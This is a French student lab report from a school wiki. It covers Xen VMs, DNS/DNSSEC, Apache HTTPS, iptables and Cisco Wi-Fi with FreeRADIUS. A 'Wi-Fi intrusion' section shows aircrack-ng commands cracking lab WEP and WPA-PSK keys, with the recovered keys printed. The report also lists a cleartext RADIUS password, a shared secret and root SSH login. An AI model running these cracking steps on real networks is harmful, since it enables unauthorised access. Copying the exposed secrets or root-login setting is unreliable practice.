bridge-group 16&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
interface GigabitEthernet0.16&lt;br /&gt;
encapsulation dot1Q 16&lt;br /&gt;
bridge-group 16&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
ssid VM_SERVICES_6&lt;br /&gt;
exit&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== '''FreeRADIUS''' =====&lt;br /&gt;
FreeRADIUS a été installé sur la machine de service. Malgré plusieurs tentatives, je n'ai pas réussi à le faire fonctionner. Dans '''/etc/freeradius/3.0/clients.conf''', j'ai ajouté :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
client wifi-ap-306 {                                                                &lt;br /&gt;
                ipaddr = 172.27.0.3                                                 &lt;br /&gt;
                secret = radius_thomas                                              &lt;br /&gt;
                shortname = wifi-e306                                               &lt;br /&gt;
                nas_type = cisco                                                    &lt;br /&gt;
}                                                                                   &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Dans '''/etc/freeradius/3.0/users''' :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;quot;tdelobel&amp;quot; Cleartext-Password := &amp;quot;Seconddegree2&amp;quot;                                    &lt;br /&gt;
        Tunnel-Type = VLAN,                                                         &lt;br /&gt;
        Tunnel-Medium-Type = IEEE-802,                                              &lt;br /&gt;
        Tunnel-Private-Group-Id = 16                                                &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Enfin, dans '''/etc/freeradius/3.0/mods-available/eap''', j'ai modifié la ligne suivante : &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
default_eap_type = peap   &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;/div&gt;</summary>
		<author><name>Tdelobel</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E6&amp;diff=12578</id>
		<title>Atelier SysRes SE4 2025/2026 E6</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E6&amp;diff=12578"/>
		<updated>2026-02-27T17:31:24Z</updated>

		<summary type="html">&lt;p&gt;Tdelobel : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Compte rendu : ===&lt;br /&gt;
&lt;br /&gt;
==== Création du bridge dans capbreton ====&lt;br /&gt;
Avant de créer nos machines virtuelles, nous ajoutons notre bridge à capbreton dans '''SE42026_cpayet_tdelobel''' :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
auto pont_pacman&lt;br /&gt;
iface pont_pacman inet manual&lt;br /&gt;
    bridge_ports none&lt;br /&gt;
    up ip link set $IFACE up&lt;br /&gt;
    down ip link set $IFACE down&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous utilisons '''ifup''' pour le démarrer.&lt;br /&gt;
&lt;br /&gt;
==== Création des VMs ====&lt;br /&gt;
Pour créer la machine virtuelle de service et la machine mandataire, nous utilisons les commandes suivantes :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
xen-create-image --hostname=SE4.Manjaro         --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force&lt;br /&gt;
xen-create-image --hostname=SE4.LinusTorvalds   --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* '''Manjaro''' sera la machine de service.&lt;br /&gt;
* '''LinusTorvalds''' sera la machine mandataire.&lt;br /&gt;
&lt;br /&gt;
Puis, nous démarrons les machines avec : &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
xen create /etc/xen/SE4.Manjaro.cfg&lt;br /&gt;
xen create /etc/xen/SE4.LinusTorvalds.cfg&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nos machines sont maintenant listées.&lt;br /&gt;
&lt;br /&gt;
==== Partitionnement ====&lt;br /&gt;
&lt;br /&gt;
===== Sur capbreton =====&lt;br /&gt;
Tout d'abord, nous allouons 10 Go d'espace pour /var et /home à notre machine virtuelle :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
lvcreate -n SE4.Manjaro.var -L 10G virtual&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous ajoutons dans '''/etc/xen/SE4.Manjaro.cfg''' : &amp;lt;syntaxhighlight lang=&amp;quot;cfg&amp;quot;&amp;gt;&lt;br /&gt;
disk = [&lt;br /&gt;
            [...],&lt;br /&gt;
            'phy:/dev/virtual/SE4.Manjaro.home,xvda3,w',&lt;br /&gt;
            'phy:/dev/virtual/SE4.Manjaro.var,xvdb1,w'&lt;br /&gt;
        ]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Sur la VM =====&lt;br /&gt;
Pour que la configuration soit enregistrée, nous modifions le fichier '''/etc/fstab''' en ajoutant les lignes suivantes :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
/dev/xvda3 /var ext4 defaults 0 2&lt;br /&gt;
/dev/xvdb1 /home ext4 defaults 0 2&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Puis, dans le terminal (à ne surtout pas utiliser sur capbreton !), nous exécutons :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
mkfs -t ext4 /dev/xvda3&lt;br /&gt;
mkfs -t ext4 /dev/xvdb1&lt;br /&gt;
mount /dev/xvda3 /mnt&lt;br /&gt;
mv /var/* /mnt&lt;br /&gt;
umount /mnt&lt;br /&gt;
mount -a&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous pouvons maintenant redémarrer la machine pour vérifier si la configuration persiste. Nous répétons le même schéma pour la machine mandataire.&lt;br /&gt;
&lt;br /&gt;
==== '''Adresses IPv4 et IPv6''' ====&lt;br /&gt;
Tout d'abord, dans notre machine de service, nous attribuons une adresse IPv4 privé et une adresse IPv6. Nous modifions donc le fichier '''/etc/network/interfaces''' :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.10.2/24&lt;br /&gt;
    gateway 192.168.10.1&lt;br /&gt;
&lt;br /&gt;
auto eth1&lt;br /&gt;
iface eth1 inet6 auto&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous ajoutons également le bridge depuis capbreton dans '''/etc/xen/SE4.Manjaro.cfg''' :&amp;lt;syntaxhighlight lang=&amp;quot;cfg&amp;quot;&amp;gt;&lt;br /&gt;
vif = [[...], 'mac=00:16:3E:36:79:D9,bridge=SE4']&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Dans la machine mandataire, nous attribuons une adresse IPv4 du réseau local et privé :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
auto lo                                                                             &lt;br /&gt;
iface lo inet loopback                                                              &lt;br /&gt;
&lt;br /&gt;
auto eth0                                                                           &lt;br /&gt;
iface eth0 inet static                                                              &lt;br /&gt;
        address 192.168.10.1/24                                                     &lt;br /&gt;
&lt;br /&gt;
auto eth1                                                                           &lt;br /&gt;
iface eth1 inet static                                                              &lt;br /&gt;
        address 193.48.57.166/24                                                    &lt;br /&gt;
        gateway 193.48.57.162                                                       &lt;br /&gt;
iface eth1 inet6 auto                                                               &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous ajoutons au fichier '''resolv.conf''' le DNS de Google et installons les outils nécessaires pour la suite (iptables-persistent, ssh, bind9, apache2, etc.).&lt;br /&gt;
&lt;br /&gt;
==== '''Masquerade et SSH''' ====&lt;br /&gt;
Nous mettons en place les règles '''iptables''' pour gérer à la fois le SSH (redirection de port) et le masquerading avec les commandes suivantes :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.10.3:22&lt;br /&gt;
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.10.0/24&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Après avoir sauvegardé avec '''iptables-save''', nous décommentons dans '''/etc/sysctl.conf''' :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Enfin, pour permettre la connexion SSH en tant que root sur toutes les machines virtuelles, nous ajoutons dans '''/etc/ssh/sshd_config''' :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Il n'est plus obligatoire de passer par capbreton pour se connecter aux machines virtuelles. Nous utiliserons les commandes suivantes :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
ssh root@193.48.57.166 #pour la machine mandataire&lt;br /&gt;
ssh root@193.48.57.166 -p 2202 # pour la machine de service&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== DNS ====&lt;br /&gt;
&lt;br /&gt;
===== Machine de service =====&lt;br /&gt;
Nous commençons par modifier '''/etc/bind/named.conf.local''' et y ajoutons notre zone principale et celle de notre camarade :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
zone &amp;quot;archlinux.lol&amp;quot; {                                                              &lt;br /&gt;
        type master;                                                                &lt;br /&gt;
        file &amp;quot;/etc/bind/zones/db.archlinux.lol&amp;quot;;                                    &lt;br /&gt;
        allow-transfer{secondaries;};                                               &lt;br /&gt;
        also-notify{hiddensecondaries;};                                            &lt;br /&gt;
        notify yes;                                                                 &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
acl &amp;quot;secondaries&amp;quot; {                                                                 &lt;br /&gt;
        192.168.10.3;                                                               &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe8b:45ed;                                      &lt;br /&gt;
        192.168.10.1;                                                               &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:feaa:bff0;                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
masters &amp;quot;hiddensecondaries&amp;quot; {                                                       &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:feaa:bff0;                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
zone &amp;quot;archlinuxbtw.lol&amp;quot; {                                                           &lt;br /&gt;
        type secondary;                                                             &lt;br /&gt;
        file &amp;quot;/etc/bind/backup/db.archlinuxbtw.lol&amp;quot;;                                &lt;br /&gt;
        primaries{2001:660:4401:60a0:216:3eff:fe8b:45ed;};                          &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                           &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Puis, nous créons notre zone '''db.archlinux.lol''' :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
$TTL 400                                                                            &lt;br /&gt;
                                                                                    &lt;br /&gt;
@ IN SOA ns.archlinux.lol. admin.archlinux.lol. (                                   &lt;br /&gt;
           3611     ; Numéro de version                                             &lt;br /&gt;
          21600     ; Rafraîchissement (6h)                                         &lt;br /&gt;
           3600     ; Re-tentative (1h)                                             &lt;br /&gt;
        2592000     ; Expiration (30j)                                              &lt;br /&gt;
          86400     ; Cache négatif (24h)                                           &lt;br /&gt;
);                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
@ IN NS ns.archlinux.lol.                                                           &lt;br /&gt;
@ IN NS ns.archlinuxbtw.lol.                                                        &lt;br /&gt;
                                                                                    &lt;br /&gt;
ns IN A 193.48.57.166                                                               &lt;br /&gt;
@ IN A 193.48.57.166                                                                &lt;br /&gt;
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe36:79d9                                    &lt;br /&gt;
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe36:79d9                                     &lt;br /&gt;
                                                                                    &lt;br /&gt;
www IN CNAME archlinux.lol.                                                         &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Machine mandataire =====&lt;br /&gt;
Dans la machine mandataire, nous passons les zones de notre machine de service en zones secondaires :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
zone &amp;quot;archlinuxbtw.lol&amp;quot; {                                                           &lt;br /&gt;
        type secondary;                                                             &lt;br /&gt;
        file &amp;quot;/etc/bind/backup/db.archlinuxbtw.lol&amp;quot;;                                &lt;br /&gt;
        primaries{2001:660:4401:60a0:216:3eff:fe8b:45ed;};                          &lt;br /&gt;
};                                                                                  &lt;br /&gt;
zone &amp;quot;archlinux.lol&amp;quot; {                                                              &lt;br /&gt;
        type secondary;                                                             &lt;br /&gt;
        file &amp;quot;/etc/bind/backup/db.archlinux.lol&amp;quot;;                                   &lt;br /&gt;
        primaries{2001:660:4401:60a0:216:3eff:fe36:79d9;};                          &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
acl &amp;quot;secondaries&amp;quot; {                                                                 &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe8b:45ed;                                      &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe36:79d9;                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Enfin, nous ajoutons nos zones aux '''Glue records''' de Gandi pour que notre DNS soit reconnu partout dans le monde. Nous pouvons vérifier cela sur le site https://dnschecker.org/.[[Fichier:Dns-check-thomas.png|centré|vignette]]&lt;br /&gt;
&lt;br /&gt;
==== DNSSEC ====&lt;br /&gt;
Pour sécuriser notre DNS, nous modifions '''/etc/bind/named.conf.local''' :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
zone &amp;quot;archlinux.lol&amp;quot; {                                                              &lt;br /&gt;
        type master;                                                                &lt;br /&gt;
        file &amp;quot;/etc/bind/zones/db.archlinux.lol&amp;quot;;                                    &lt;br /&gt;
        allow-transfer{secondaries;};                                               &lt;br /&gt;
        also-notify{hiddensecondaries;};                                            &lt;br /&gt;
        notify yes;                                                                 &lt;br /&gt;
        key-directory &amp;quot;/etc/bind/keys&amp;quot;;                                             &lt;br /&gt;
        dnssec-policy &amp;quot;dnspol&amp;quot;;                                                     &lt;br /&gt;
        inline-signing yes;&lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
acl &amp;quot;secondaries&amp;quot; {                                                                 &lt;br /&gt;
        192.168.10.3;                                                               &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe8b:45ed;                                      &lt;br /&gt;
        192.168.10.1;                                                               &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:feaa:bff0;                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
masters &amp;quot;hiddensecondaries&amp;quot; {                                                       &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:feaa:bff0;                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
zone &amp;quot;archlinuxbtw.lol&amp;quot; {                                                           &lt;br /&gt;
        type secondary;                                                             &lt;br /&gt;
        file &amp;quot;/etc/bind/backup/db.archlinuxbtw.lol&amp;quot;;                                &lt;br /&gt;
        primaries{2001:660:4401:60a0:216:3eff:fe8b:45ed;};                          &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot; {                                                            &lt;br /&gt;
   keys {                                                                           &lt;br /&gt;
       ksk key-directory lifetime unlimited algorithm 13;                           &lt;br /&gt;
       zsk key-directory lifetime unlimited algorithm 13;                           &lt;br /&gt;
   };                                                                               &lt;br /&gt;
   nsec3param;                                                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous ajoutons un répertoire pour les clés (auquel nous donnons les permissions d'écriture) :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
mkdir /etc/bind/keys &lt;br /&gt;
chown bind:bind /etc/bind/keys &lt;br /&gt;
chmod 750 /etc/bind/keys&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Après avoir redémarré '''bind9''' et '''named''', nous pouvons constater que les clés sont bien générées. Pour vérifier si notre DNS est sécurisé, nous utilisons &amp;lt;nowiki&amp;gt;https://dnsviz.net/&amp;lt;/nowiki&amp;gt;.&lt;br /&gt;
[[Fichier:DNSSEC-thomas.png|centré|vignette]]&lt;br /&gt;
&lt;br /&gt;
==== '''Serveur Apache''' ====&lt;br /&gt;
&lt;br /&gt;
===== Sur la machine de service =====&lt;br /&gt;
&lt;br /&gt;
Nous générons d'abord notre clé avec :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
openssl req -nodes -newkey rsa:2048 -sha256 -keyout archlinux.lol.key -out archlinux.csr&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Une fois la clé générée, nous récupérons le certificat sur Gandi. Nous créons ensuite notre site dans '''/etc/apache2/sites-available/archlinux.lol.conf''' :&lt;br /&gt;
&lt;br /&gt;
La page html sera enregistré dans '''/var/www/archlinux.lol'''.&lt;br /&gt;
&lt;br /&gt;
Nous effectuons aussi une redirection du port HTTP vers HTTPS.&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;                                                                  &lt;br /&gt;
    ServerName archlinux.lol                                                        &lt;br /&gt;
    ServerAlias www.archlinux.lol                                                   &lt;br /&gt;
    Redirect permanent / https://archlinux.lol/                                     &lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;                                                                      &lt;br /&gt;
                                                                                    &lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;                                                                 &lt;br /&gt;
    ServerName archlinux.lol                                                        &lt;br /&gt;
    ServerAlias www.archlinux.lol                                                   &lt;br /&gt;
    DocumentRoot /var/www/archlinux.lol                                             &lt;br /&gt;
                                                                                    &lt;br /&gt;
    &amp;lt;Directory /var/www/archlinux.lol&amp;gt;                                              &lt;br /&gt;
        Options Indexes FollowSymLinks                                              &lt;br /&gt;
        AllowOverride All                                                           &lt;br /&gt;
        Require all granted                                                         &lt;br /&gt;
    &amp;lt;/Directory&amp;gt;                                                                    &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    ErrorLog ${APACHE_LOG_DIR}/error.log                                            &lt;br /&gt;
    CustomLog /var/log/apache2/secure_access.log combined                           &lt;br /&gt;
                                                                                    &lt;br /&gt;
    SSLEngine on                                                                    &lt;br /&gt;
    SSLCertificateFile /etc/ssl/certs/archlinux.lol.crt                             &lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/private/archlinux.lol.key                        &lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/certs/GandiCert.pem                            &lt;br /&gt;
                                                                                    &lt;br /&gt;
    SSLVerifyClient None                                                            &lt;br /&gt;
                                                                                    &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;                                                                      &lt;br /&gt;
                                                                                    &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Notre site est maintenant accessible en IPv6. Nous configurons ensuite la machine mandataire pour qu'il le soit aussi en IPv4.  &lt;br /&gt;
&lt;br /&gt;
===== Sur la machine de mandataire =====&lt;br /&gt;
Après avoir récupéré les clés et certificats, nous créons un fichier '''/etc/apache2/sites-available/archlinux.lol-proxy.conf''' :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;                                                                  &lt;br /&gt;
    ServerName archlinux.lol                                                        &lt;br /&gt;
    ServerAlias www.archlinux.lol                                                   &lt;br /&gt;
    Redirect permanent / https://archlinux.lol/                                     &lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;                                                                      &lt;br /&gt;
                                                                                    &lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;                                                                 &lt;br /&gt;
    ServerName archlinux.lol                                                        &lt;br /&gt;
    ServerAlias www.archlinux.lol                                                   &lt;br /&gt;
                                                                                    &lt;br /&gt;
    SSLProxyEngine on                                                               &lt;br /&gt;
    ProxyPass / https://archlinux.lol/                                              &lt;br /&gt;
    ProxyPassReverse / https://archlinux.lol/                                       &lt;br /&gt;
    ProxyPreserveHost on                                                            &lt;br /&gt;
                                                                                    &lt;br /&gt;
    SSLEngine on                                                                    &lt;br /&gt;
    SSLCertificateFile /etc/ssl/certs/archlinux.lol.crt                             &lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/private/archlinux.lol.key                        &lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/certs/GandiCert.pem                            &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    ErrorLog ${APACHE_LOG_DIR}/error.log                                            &lt;br /&gt;
    CustomLog ${APACHE_LOG_DIR}/access.log combined                                 &lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;                                                                      &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Notre site est maintenant disponible partout et en HTTPS.&lt;br /&gt;
[[Fichier:Site-thomas.png|centré|vignette]]&lt;br /&gt;
&lt;br /&gt;
==== Effraction WIFI ====&lt;br /&gt;
&lt;br /&gt;
===== Cassage WEP =====&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo airodump-ng wlan1&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous trouvons '''cracotte06''' avec son adresse et son canal :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo airodump-ng wlan1 --write dump --bssid 04:DA:D2:9C:50:55 -c4&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Le fichier '''dump''' étant créé, nous récupérons la clé avec :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo  aircrack-ng -b 04:DA:D2:9C:50:55 dump-22.cap&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Résultat :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
                                                                                     Aircrack-ng 1.7 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                                                                       [00:00:00] Tested 525 keys (got 63977 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    1/  2   20(74752) 5B(73216) F0(73216) 1E(72704) 77(72192) 12(71936) 78(71936) ED(71936) 21(71680) EF(71680) 58(71424) AE(71424) 4D(71168) 5A(70656) 02(70400) &lt;br /&gt;
    1    5/  1   48(74496) DA(71936) 47(71680) 55(71680) B9(71168) BD(70656) DE(70656) 01(70400) 77(70400) A2(70400) 6C(70144) 74(70144) 7C(70144) 8E(70144) 92(70144) &lt;br /&gt;
    2   73/  2   CE(66560) CC(66304) E2(66304) DD(66048) ED(66048) 69(65536) 97(65536) A7(65536) AC(65536) B8(65536) 44(65280) 72(65280) D7(65280) EA(65280) F4(65280) &lt;br /&gt;
    3    7/ 11   5C(73984) 14(72960) 6E(72960) E8(72448) 00(71424) EB(71424) 04(71168) 23(70912) 35(70912) AB(70912) 58(70656) 1B(70400) CA(70400) D4(70400) FE(70400) &lt;br /&gt;
    4    0/  3   F6(92416) 2D(73472) 30(72704) 6A(71680) 9D(71680) BD(71680) C9(71680) 2B(71168) 3D(70400) 52(70400) C8(70400) D8(70400) 49(70144) F8(70144) FE(69632) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ FF:FF:FF:FF:FA:BC:07:CB:AE:EE:EE:EE:EE ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== '''Cassage WPA-PSK''' =====&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo airodump-ng wlan1 --write dump --bssid 44:AD:D9:5F:87:05 -c13&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous essayons de récupérer la clé avec un dictionnaire '''dico.txt :'''&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo  aircrack-ng -a2 -w dico.txt -b 44:AD:D9:5F:87:05 dump-23.cap&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Résultat :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
                               Aircrack-ng 1.7 &lt;br /&gt;
&lt;br /&gt;
      [00:28:29] 66973408/100000000 keys tested (39839.22 k/s) &lt;br /&gt;
&lt;br /&gt;
      Time left: 13 minutes, 48 seconds                         66.97%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 66684666 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 63 5F 7F 36 2C 70 49 04 6A 29 11 FE C8 C1 0C FD &lt;br /&gt;
                       4D 16 18 BE C9 48 70 31 C5 7B 13 BD E1 02 8A 15 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== '''Sécurisation Wi-Fi''' ====&lt;br /&gt;
&lt;br /&gt;
===== '''Configuration du routeur''' =====&lt;br /&gt;
Nous configurons notre interface, son VRRP et le DHCP :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
ip dhcp pool PoolThomas                                                             &lt;br /&gt;
 network 10.60.6.0 255.255.255.0&lt;br /&gt;
 dns-server 193.48.57.166                                                           &lt;br /&gt;
 default-router 10.60.6.254                                                         &lt;br /&gt;
!                                                                                   &lt;br /&gt;
...&lt;br /&gt;
vlan 16                                                                             &lt;br /&gt;
 name E6-Thomas                                                                     &lt;br /&gt;
!&lt;br /&gt;
...&lt;br /&gt;
interface Vlan16                                                                    &lt;br /&gt;
 ip address 10.60.6.2 255.255.255.0                                                 &lt;br /&gt;
 ipv6 address 2001:660:4401:60A6::2/64                                              &lt;br /&gt;
 vrrp 16 address-family ipv4                                                        &lt;br /&gt;
  priority 110                                                                      &lt;br /&gt;
  address 10.60.6.1 primary                                                         &lt;br /&gt;
  exit-vrrp                                                                         &lt;br /&gt;
!&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== '''Configuration des bornes Wi-Fi''' =====&lt;br /&gt;
Sur les bornes Wi-Fi, nous appliquons la configuration donnée par le sujet :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
conf t&lt;br /&gt;
&lt;br /&gt;
aaa new-model&lt;br /&gt;
aaa authentication login eap_student5 group radius_student5&lt;br /&gt;
radius-server host 192.168.10.2 auth-port 1812 acct-port 1813 key secret_student6        &lt;br /&gt;
aaa group server radius radius_student5                      &lt;br /&gt;
server 192.168.10.2 auth-port 1812 acct-port 1813        &lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
dot11 ssid VM_SERVICES_6       &lt;br /&gt;
vlan 16         &lt;br /&gt;
authentication open eap eap_student6 &lt;br /&gt;
authentication network-eap eap_student6&lt;br /&gt;
authentication key-management wpa&lt;br /&gt;
mbssid guest-mode&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
encryption vlan 16 mode ciphers aes-ccm                  &lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0.16&lt;br /&gt;
encapsulation dot1Q 16&lt;br /&gt;
bridge-group 16&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
interface GigabitEthernet0.16&lt;br /&gt;
encapsulation dot1Q 16&lt;br /&gt;
bridge-group 16&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
